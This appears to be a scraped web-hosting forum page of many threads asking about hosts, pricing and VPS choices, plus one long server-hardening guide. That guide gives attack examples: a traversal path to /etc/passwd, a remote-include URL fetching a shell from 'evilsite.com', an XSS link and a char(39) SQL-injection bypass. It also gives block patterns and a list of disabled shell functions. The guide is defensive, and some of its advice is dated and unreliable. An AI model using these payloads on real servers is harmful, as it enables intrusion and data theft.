Is It Worth The Extra Cost Of Using A UK Hosting Company For A UK Site
Mar 28, 2007
I'm just about to buy my first commercial hosting package. I'm leaning towards 1 and 1 hosting, but I don't know whether to go for the US or UK version.
The US version:
costs $2.99 a month
with 10GB storage and 300GB transfer
The UK version:
costs £4.49 a month (about $8)
with 1.5 GB storage and 20GB transfer
Are there many big / important advantages to going with a local host, and is it worth the extra cost?
View 11 Replies
ADVERTISEMENT
Apr 26, 2008
Pair is really well respected (from what I've heard), but their dedicated servers are a lot more expensive than many I've looked at. I've honestly wanted to use them because of their reputation, and my uptime being critical, but wanted to see if there are less expensive servers who are just as good...
View 7 Replies
View Related
Jul 12, 2008
So far I really haven't found any free hosting options that I would personally use for any of my websites. Are there any "full-featured" free hosting options that a lot of people don't know about?
View 3 Replies
View Related
Sep 17, 2008
What are the most important things to look for in a hosting company?
Cost?
Network Speed?
Uptime?
Quality hardware?
Quality Support?
Fast Support?
Redundancy?
Most people would say all of above right? Well, if you had to stack each of the above in order of importance, where would you put cost at? Is it at the top for you or at the bottom? If I had to rate each of them it would look something like this:
Uptime
Network Speed and reliability
Redundancy of power, bandwidth, cooling
Reputable Tier 1 carriers of bandwidth
Quality Support
Fast Support
Quality hardware
Cost
The problem is that I see many people on WHT acting like Cost if the #1 factor in determining a host. And when you let cost be your #1 determining factor, you will be usually sacrificing on some or all of the other factors that you should be looking at. The higher up the list you put cost in deciding where to host, the more you will sacrifice quality in these other important areas.
"But", you say, "I see many quality companies offering cheap pricing. Shouldn't I choose to go with them?" Consider this, hosting companies like any other business need to be able to make a profit. Sale prices are great but there are reasons for sale prices and you need to consider these reasons when choosing to buy a cheap server. Some common reasons for selling servers for extremely cheap are;
- The hardware is used and old and the hosting company is just looking get something for it. ANYTHING!
- They have an excess of inventory for one reason or another that they need to get rid of.
- They buy their servers used on Ebay and can therefore afford to sell them cheap.
- The cheap server is merely a loss leader used to bring business in order to sell other products and services at full price but is not a regular price that you can expect from this company.
- The company is new and is looking to attract prospective clients on price alone and is dropping the price just to get their client base increased quickly.
There are companies selling servers on WHT who fall into each of these categories so you need to think about this when you make a decision for who to go with. The common denominator with the above list is simple... It is Unsustainable! Not one of the reasons listed above can be sustained for a long period of time.
If you can get a good deal on a server with a solid company, and there are many on WHT that are great companies who have great deals on servers at times, then that is wonderful. But do not expect that you will be able to get insanely cheap pricing on a regular basis from this company and don't be surprised when you want another server if the price is significantly higher. Every hosting company has certain costs that are unavoidable:
- Rent
- Power
- Bandwidth
- Payroll
- Employee Benefits
- Server Hardware Costs
- Software Licensing
- Marketing and Advertising
- Maintenance Contracts
- Network Equipment
- Infrastructure Replacement (a/c's, generators, UPS units, etc.)
- Other Utilities
The point in bringing all of this up is that if you plan on finding a hosting company that you can stay with for the long haul, you need to look at their regular pricing for retail servers and for reselling servers. Cheap prices are great, but no business can stay in business if they only offer cheap pricing. And if a hosting company is only attracting you by their cheap pricing, then it shows that they are most likely weak when it comes to the other essential factors mentioned above that need to be considered. Any hosting company selling servers for under $80 per month for instance is loosing money in some way. Eventually, the price will be raised to cover those costs (like at LT this year) and then you are left to make up that difference.
As with most things in life, good quality cannot be sold cheap, and that which is cheap is usually not good quality.
View 14 Replies
View Related
May 13, 2008
What is the best way to transfer the cost of webhosting to a client?
What I'm trying to establish is for instance, if you design a website and offer to set-up the hosting for them for say, an inital 2-year period, how do you go about getting them to pay for the hosting after the 2 years has expired? The same obviously applies to a domain right?
View 12 Replies
View Related
Aug 24, 2007
I am having really bad experiences with my current host. I guess I've overlook "quantity" over "quality". I got my current hosting account (almost 3 months now) from ebay...I guess that sums up pretty much everything. Actually I knew it was a newly startup company, but they offer WHM as well (which a function I really want for other reasons) for a really low price of one year with unlimited everything. I know.....I know.....there is no such thing, but I've figure I would not reach their limits anytime soon. So I went for it.....test drive I would rather put it. Let's make the long story short:
* 2 weeks after account setup, server down for 7 days (because their servers got hacked).
* Received email, everything was lost and "all accounts will be move to their new SUPER FAST servers (yes indeed, I've to say !) in the next couple of days".
* Waited another 4 days, nothing. Summited a support ticket; their response was all their clients account was already moved to the new servers with an new ip which I did not get notified.
* Fine, re-setup everything and.....cross my fingers!
* Everything went well for...almost a month and half. (Well...other then the company was brought by another company ) Other then that, server will be down 10, 20 mins. at a time here & there.......
* Until yesterday.....I thought it was like the usual 10, 20 mins., but it was more than half an hour, 1 hour, 2 hours, 3 hours,.....I went to check on "their" web site, no longer accessible. Then I know it's time for me to look for a new host.
Anyway, sorry for the long post. I think I should rather change the title to "Really bad hosting experience from....." (Rather not to mention who, but if anybody care to know...)
Well, any offers from any web host in here?
Yes, THIS is one of my site. Let me know if / when it is working! Post the time if possible.
View 4 Replies
View Related
Apr 9, 2008
I'm planning on launching a php-based web application within a month or two and am weighing different hosting options. I was almost certain with my plan to use two dedicated servers (one for web, one for db) but I can't help reading about all of these new grid/cloud/utility hosting solutions that promise instant scalability and deployment - which sounds like a blessing. I know there is a lot of garbage and marketing hype so I felt I should ask what the real deal is. Are these services reliable, worth using, really that easy to use, powerful, etc? I was looking at gogrid's demo videos and to instantly launch a few web servers, a db server, load balancer, etc, in 15 minutes for 30% of the cost - I can't ignore it.
So whats the deal?
View 4 Replies
View Related
Jan 15, 2009
I am interested in setting up a video tube site similiar to xtube or gaytube etc but maybe at a smaller scale. Where ppl can upload clips, affiliate clips, and even have amateur clips to sell etc like what the popular gay tubes do.
<< removed >>
View 3 Replies
View Related
Apr 16, 2008
if i want to make image hosting such as allyoucanupload or imageshack , where hosting should i go to,... i was with hostgator and they suspended me for it.
View 14 Replies
View Related
May 21, 2008
is there anyone knows for a good hosting located in uk,which is allowed : adult site and casino betting online site ?
im looking for vps and dedicated server.
please help me i really need as soon as possible.thx
View 2 Replies
View Related
Aug 31, 2009
I'm planning to launch an e-commerce website for photo and gift printing. I went on Google and found a few websites having Top 10 web hosting companies information. I am really confuse which one is the best for my website.
I'm not sure how many users and traffic the website will get and don't want to pay extra $$$s for VPS or dedicated servers
View 24 Replies
View Related
Sep 21, 2007
I was wondering if you guys would recommend a hosting company to use a VPS? I am a web designer and as a side job i am thinking of selling reseller accounts for very cheap prices. I am mainly concerned mainly because of the RAM most VPS have . I mean is 248 and 512 mb really ok? Also , anyone have an insight on "burst ram"? What does this mean?
View 14 Replies
View Related
May 27, 2007
I will be starting up a new hosting company that will offer free and paid hosting. My question is, should I start out with a reseller, and move on as needed? I was simply thinking of starting out with a VPS, so I could simply skip the reseller part. I read elsewhere that some simply get a reseller and get another reseller when they need it.
What path should I choose. I could always get a VPS later on, but why not get one now? This is one reason I ask, because since reading about the reseller post, I am now split on this.
To note, have used a reseller before, but not a VPS. I do want to eventually learn to run a VPS, so this could be the time to do so.
View 6 Replies
View Related
Jul 28, 2007
I recently made a purchase of a really busy website and I need about 1024 Guaranteed Ram 20Gb+ disk space and 1000gb bandwidth VPS.
Please make some suggestions based on:
1- Customer/Technical Support
2- Pricing
3- Their ability to maintain a good service at all times.
View 14 Replies
View Related
Sep 20, 2008
we have about 10 servers in iweb.ca , iweb is good but account managers support are very poor ! for example when I need to upgrade my server I should contact my account manager and my account manager answer to my email after 2 weeks ! (if he answer)so I want to transfer my servers to another company ,
what's your suggestions ?
most of our servers are Linux.
P.S : we are Iranian
View 9 Replies
View Related
Jul 19, 2009
I have tried Hostgator, Netfirms, UbiquityHosting, doesn't seem to allow to execute Rebol in cgi-bin
View 12 Replies
View Related
Oct 6, 2009
I've read articles that said it's generally bad to use the domain registrar as the hosting company(forgot the reason though)Right now I have some domains in Goddady and 1and1, and have a Hostgator account. I am thinking about just using Goddady's hosting service so I only need to manage my Goddady and 1and1 accounts instead of managing 3 accounts.
I am going to use Wordpress.org to build the sites
View 14 Replies
View Related
Oct 20, 2009
I have recently built my first database application.I used SQL Server 2005 Express edition because it is free. The drawback is that it can only hold 4GB of data. But the database is also compatible with any SQL Server edition.
I'm wondering what my options are - a lot of hosting companies seem to offer a greater storage capacity and then limit the actual size of the SQl database. i.e. 10GB of online diskspace with a 600MB SQL database.
View 9 Replies
View Related
Jul 30, 2009
I have a dilemma now as I don't know which company is better to use for my needs- allwebnow.com or webhostgiant.com.
I want to use shared hosting.
View 13 Replies
View Related
Apr 17, 2009
I am in the process of creating a site for my family, which is spread out around the world. I am using Joomla and have built my site on Siteground as my host.
My site will have low traffic, for family only, but I want my family to be able to post pictures, chat and blog.
I am very happy with Siteground but it has come to my attention that even though they offer 750gb of space I can only have up to 5gb of picture files (gif, jpg, etc.) I feel that I will eventually exceed this and being new at the whole site creation, I do not want to risk data being lost (database, files, etc.) when the time comes to transfer to a new host.
The site is not active yet as I am still working out the kinks and adding more pages. I figure if I am going to make a move to another host now would be the best time.
So I guess the question I have is what hosts, in your opinions, would be the best for the site I explained and still be able to work in Joomla.
View 14 Replies
View Related
Jan 2, 2008
can any one recommend me a uk hosting company.
View 5 Replies
View Related
Feb 14, 2008
I wanted Media Temple's DV hosting for reselling, but, they don't provide Windows Hosting.
So, which is the best Windows Host for reselling, around mt's DV pricing.
Is it Rackspace? or some other company?
View 16 Replies
View Related
Mar 17, 2008
I am very interested in web hosting and domain names and i would like to run my own small business web hosting company. I don't have large knowledge in this domain, but i found some reseller company e.g Hostgator. The process is buying some spaces and i resell them.
View 23 Replies
View Related
Feb 22, 2008
HostWW.net - quite nice and good so far (with Cpanel) and Resellerzoom.com still works.
View 6 Replies
View Related
Jan 30, 2007
i have website named almtechnology.com.now problem is that i have lost my hosting detail from where i have purchase.for eg i want to ask question about dns and email forwarding how i can ask my questions (submit ticket)to my hosting company how i know who is the company hosted my detail
View 3 Replies
View Related
Jan 28, 2007
I have an old domain thats hosted somewhere (cant remember the name of the hosting company) I need to migrate/move that domain/host across to a new server but i dont have any details of my old/current hosting
Ive done a whois on it and all its giving me for dns is ns1.chost2.com
Can you tell me which company owns the above dns or how i can find out?
View 1 Replies
View Related
Jun 28, 2007
-= Securing Your Hosting Company =-
-- Credits: DeadlyData --
Part I. Your own websites security.
The first step you always want to take to secure your hosting company is to make sure your own website.
Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there.
Next try any Get Vars in your scripts and put a ' at the end of them what I mean is you have = you add ' so it's yourwebsite.com/page?=' or any other similar thing not only page= you may also try char(39) rather then only ' most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ' but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.
The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.
If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)...
If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use
The following to browse into other places ../../../../ if they wanted to they'd view your passwd file via ../../../../../../etc/passwd
Well right now you'd say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it
Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all...
Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.
Ok next were going to discuss the abilities of an RFI and how to block it...
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.
Prevention add http:// to your mod security this way when they try remotely including a file in the URL
[url] mod_security will block it.
Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this...
What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn't really see it... but when you clicked they could potentially grab your cookie or any current stored browser information.
With this they could use your cookie as their own to login as you... maybe even get password information from this
cookie...
Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as...
www.mysite.com/info.php?xss=<script>src=[url]
Never click it what so ever... ban the person who has sent this.
Ok now for the mod_security bans... add <script> add <body= add </script> add ">
And this should fix your XSS problems that can actually cause damage...
As for SQL injection the way to block this is to... add ' or /* to the mod security be sure to add in char(39) as it's ' in php and php will in fact read it from a URL and interpret it as ' and still launch the sql injection.
One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.
Zend should fix this problem.
Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.
Part II. Your Employees
RULE-1 -PASSWORDS
Do not use password even more then once on your servers if you do the first time some one gets your password to any
Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company...
RULE-2 -PHONE CHATS
Always request a person's information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.
RULE-3 -Email CHATS
This one is a bit easier there is no emotion to what the person is trying to do...
If they slip up on one peace of information be sure to email them back and ask them to correct it before even
Sending any thing back or touching any thing.
RULE-4 -Talking to each other
While talking to each other in public services.. or services that my be able to be taped such as an IRC...
Be sure not to mention any root passwords, client names, etc...
Part III. Securing Your Server
Ok well first were going to do the obvious and CHMOD /home to 755
This is simple just go ahead and type chmod 755 /home
Or
CD /
chmod 755 home
Next were going to make sure no user has any bash access what so ever.
This may already be setup by the current hosting control panel you are using...
If not were going to nano /etc/passwd and make sure all Linux users that you don't want having bash are set to
/sbin/nologin
I realize some hosting companies also do dedicated server companies so it wouldn't work out if your client didn't have
bash to the server.
So this is mainly based for the shared hosting servers.
Part IV. PHP Configuration.
Now were going to do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory [:...]
safe_mode_exec_dir = directory [:...]
expose_php = Off
register_globals = Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,
phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate
Some explanations of the functions your disabling.
show_source(), Disables functions most shells use to view the source of other files one commonly
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don't
want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to
date.
system, Allows Bash Commands Via PHP
shell_exec, Allows Bash Commands via PHP
exec, Allows Bash Commands Via PHP
popen, Almost like Bash not quite but close using PHP
proc_open, Almost like bash not quite but close using PHP
base64_decode, decodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security
base64_encode, encodes base64 encryptions... reason for disabling also allows users with server access to bypass mod security
proc_terminate, Terminates Processes running on the server.
Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL injections.
Part V. MySQL and Apache Configurations
Disable all out bound MYSQL connections...
Besides from Trusted Servers
This may actually be set in the host's field of the users in the actual MYSQL table, for each user account it lets you
Give them an IP or type any I'd recommend giving them an IP...
Although when you give them and IP don't worry it's not that you can only have one IP able to access that user you
do in fact have the ability to recreate the user
over and over and fill in the IP field differently each time.
Next you need to configure your apache to where it runs 1 process for each linux user and all scripts ran by that user run under their unix/linux permissions,GID & UID
A reference Document on how to do this can be found here.
[url]
Comments:
What this will do with apache is pretty much make sure that the users can't access other users directories on the
Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same
server... this protects against it. All though apache is running under each user using SuEXEC would solve that problem.
Part VI. SSH Keys.
It's not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.
A tutorial on how to do this can be found here:
[url]
If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.
There are some references for this located here
[url]
And here
[url]
Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup
Down To The Back Door Protection
In the even some one gets access to your server even with all the security you've gotten so far they might just be able to figure out one way or another to slip a backdoor in or in the case of ubiquity a botnet client,
So what exactly are some things you can do to prevent this if not stop it.
Well I honestly don't think you can stop things like root kits, Trojans, viruses, botnet clients etc. from being on your System.
But you can stop or remove them once their on your system, or prevent them from being ran.
What all can a person do just by having the ability to upload a file.
Not much but once they find ways to execute what they have uploaded then you can pretty much consider them having root to your server.
At this point they can run multiple exploits that may be able to BoF(Buffer Over Flow) An process running under root on your system and from there they could get lucky and have the ability to execute code as that process.
Another thing they can do without having root is install an botnet client once this is done they have the ability to use your servers as their own resource to take other things down.
Trojans & Viruses on Linux aren't too much of a worry as there aren't too many out there but the ones that are made might just have enough access to delete most of the HDD on the Linux system.
Now a couple things I've researched on that can help prevent this.
---
Root Kit Hunter.
---
Description:
Root kit scanner is scanning tool to ensure you for about 99.9%* you're clean of nasty tools. This tool scans for
Root kits, backdoors and local exploits by running tests like:
- MD5 hash compare
- Look for default files used by root kits
- Wrong file permissions for binaries
- Look for suspected strings in LKM and KLD modules
- Look for hidden files
- Optional scan within plaintext and binary files
-------
Comments:
I highly recommend Root Kit Hunter.
---
Download
---
[url]
---
Clam Antivirus
---
Description:
* Command-line scanner
* Fast, multi-threaded daemon with support for on-access scanning
* milter interface for sendmail
* advanced database updater with support for scripted updates and digital signatures
* virus scanner C library
* on-access scanning (Linux and FreeBSD)
* virus database updated multiple times per day (see home page for total number of signatures)
* built-in support for various archive formats, including Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM,
BinHex, SIS and others
* built-in support for almost all mail file formats
* built-in support for ELF executables and Portable Executable files compressed with UPX, FSG, Petite, NsPack,
wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor and others
* built-in support for popular document formats including MS Office and Mac Office files, HTML, RTF and PDF
-------
Comments:
Honestly I'd recommend this even when using Mod-Security I've built shells that will in fact bypass modsecurity well
this well scan the source codes of the PHP shell
and make sure there�s nothing that could potentially harm or allow the user to have to much access over the system.
---
Download
---
[url]
--
Banning The Brute Forcers, FTP, SSH, etc.
---
APF (Advanced Policy Firewall)
---
Description:
Rather then grabbing this one off their site I figured I'd write one.
Well in my experience this is nothing like a normal firewall you would use on an windows system it checks for things like people trying to brute force Cpanel, SSH, FTP, etc. accounts.
Allows alot of configuration options some of which may also benfit in bandwidth saving and DDoS prevention,
Over all it blocks those ports your not using so even if some one manages to get an undetectable backdoor/botnet on your systems.
Then this will block it from connecting back to them and them connecting back to it.
---
Comments:
I will tell you no though this will be a pain to setup while hosting so many teamspeaks on account of all the ports you would have to constantly forward.
To make sure every one has the ability to get into their teamspeaks,
Some commands that can be used with this Firewall just incase you decide to use it.
Banning an IP
apf -d IP
Unbanning an IP
apf -u IP
I recommend ignoring your own IP in the
/etc/apf/allow_hosts.rules
Using the following syntax you can ignore your IP from all firewall rules meaning you don't follow them.
d=PORT:d=IP // ENABLES YOUR IP COMMING IN ON THE PORT
out:d=PORT:d=IP // ENABLES YOUR IP GOING OUT ON THE PORT
For ranges you may do the following 192.168.1.1/255
It will then forward from 192.168.1.1 to 192.168.1.255 to be enabled
---
Download
---
[url]
Part VIII. DDoS Protection and Saving Bandwith + Remote Loging.
---
Server Monitoring Remotely
---
Log Watch
---
Description:
An application that runs twenty-four seven on your server and sends the following things after going through them to your email.
-Apache_Access Logs
-Apache_Error Logs
-SSH_LOGIN's Failed Or Succeeded
-FTP Logs
-Mail Logs
-Current HDD Sizes
-Kernel Logs
-Mail Logs
-Yum/APT-GET Logs
Comments:
This thing is very useful attempts to gain access to your server will be automatically emailed to you along with every thing that is not found gave some one and forbidden error and etc.
The only main requirement is that you have SendMail Running.
Mail Spam Protection
---
Spam Assassin
---
Description:
The core distribution consists of command line tools to perform filtering along with Mail:pamAssassin, a set of Perl modules which allow SpamAssassin to be used in a wide range of products.
Comments:
Never used it my self because I've never really had to bad of mail spam problems on my server but from what I've
read it is in fact pretty good at filtering out the spam in your emails.
---
Download
---
[url]
---
Some Extra Mail Protection
---
Be sure that your mail-server only allows your Server to use it or any other servers you may trust and deny all
others
many people will attempt to use open mail servers and spam resources.
---
DDoS Protection & Bandwidth Saving.
---
Ok first off some things people might do while DDoSing you.
Unless theDDoS attack is very strong I highly doubt it will take your whole server offline most DDoS attacks will mainly hit their targets port
in most cases their target would be Apache, but in other cases maybe even a teamspeak it's a little more difficult to stop without having to get all of your clients IP addresses and adding them to the ignore lists in APF
But a basic thing you can do is have APF installed drop all ICMP packets. This will disable the ability to ping your server.
Next Install DDoS Deflate
---
DDoS Deflate
---
Comments/Description:
From my own experience an well written Perl Script that was made to run along with APF and monitor how many times an
IP is connected to your server before it bans it you may also run it manually typing the following in shell.
ddos Number Of Connections Allowed
When this is typed the Perl script will then run an netstat command check how many times each IP is connected and if there are more then the number of connections you specified then it will automatically run a command in APF for the IP to be banned.
---
More Information can be found on this at
[url]
----
Download
----
[url]
Ok now for bandwidth saving and DDoS protection at the same time there is this really cool thing made for apache servers it's called mod_evasive
It will limit the number of connections a person may open with apache and if they open to many it will ban them for what ever time you specify in the config.
---
mod_evasive
---
Detailed Description:
mod_evasive is an evasive maneuvers module for Apache to provide evasive action in the event of an HTTP DoS or DDoS attack or brute force attack. It is also designed to be a detection and network management tool, and can be easily configured to talk to ipchains, firewalls, routers, and etcetera. mod_evasive presently reports abuses via email and syslog facilities.
Detection is performed by creating an internal dynamic hash table of IP Addresses and URIs, and denying any single IP address from any of the following:
* Requesting the same page more than a few times per second
* Making more than 50 concurrent requests on the same child per second
* Making any requests while temporarily blacklisted (on a blocking list)
This method has worked well in both single-server script attacks as well as distributed attacks, but just
like other evasive tools, is only as useful to the point of bandwidth and processor consumption (e.g. the amount of bandwidth and processor required to receive/process/respond to invalid requests), which is why it's a good idea to integrate this with your firewalls and routers for maximum protection.
This module instantiates for each listener individually and therefore has a built-in cleanup mechanism and scaling capabilities. Because of this per-child design, legitimate requests are never compromised (even from proxies and NAT addresses) but only scripted attacks. Even a user repeatedly clicking on 'reload' should not be affected
Unless they do it maliciously. mod_evasive is fully tweak able through the Apache configuration file, easy to
Incorporate into your web server, and easy to use.
--- Comments:
This is a module I have in fact used with Apache before it honestly can get annoying if you configure it incorrectly
because you will be simply visiting the website and get banned.
---
Download/Install Tutorial
---
[url]
--= That Will Cover Alot Of Security Issues =-
View 14 Replies
View Related
Oct 2, 2007
I have a question about web hosting companies.
If the company which I take my plan with it has been hacked or damaged. sorry about my English I don't know how to say that!
Then What will I do?
is my website will gone?
View 10 Replies
View Related
Aug 31, 2006
My boss has recently asked me to source a new host for our servers. At the moment we're running 8 Windows boxes but are unhappy with the service we're receiving from our hosting company. We are looking for a managed hosting company, that has offices in the UK and US to look after the servers.
At the moment we haven't nailed down our exact requirements so I'm just really looking for any recommendations you guys might have. I've done a wee bit of Googling and have found a company called Rackspace but I'm ideally looking to contact around 5 companies to see who can offer us the best deal.
View 14 Replies
View Related
Sep 27, 2008
I'm looking for a dedicated hosting server to store more than 800GB in video. This video will not be played back, this place is just to store and where people can download.
As far as I can tell my only solutions is dedicated, but if anyone can offer me a better solution please let me know. Before I had this videos on different servers but the company does not allow me to keep them for storage.
I need to know the top 3 hosting companies in the US, and why you like them.
I like aplus.net but after doing some research I found out that this company is a nightmare.
Please, I need help really fast! Thank you all in advanced for your suggestions.
View 7 Replies
View Related
Apr 10, 2008
Let's say, I want to setup a hosting company in 3 different location (US, EU, ASIA) and I want to host 3 different servers on each datacenter. They will not be cluster. Customers will have an option to chose their datacenter location on the ordering page. But I want to use only one IP block /24 for all 3 different location.
Is it possible?
View 12 Replies
View Related
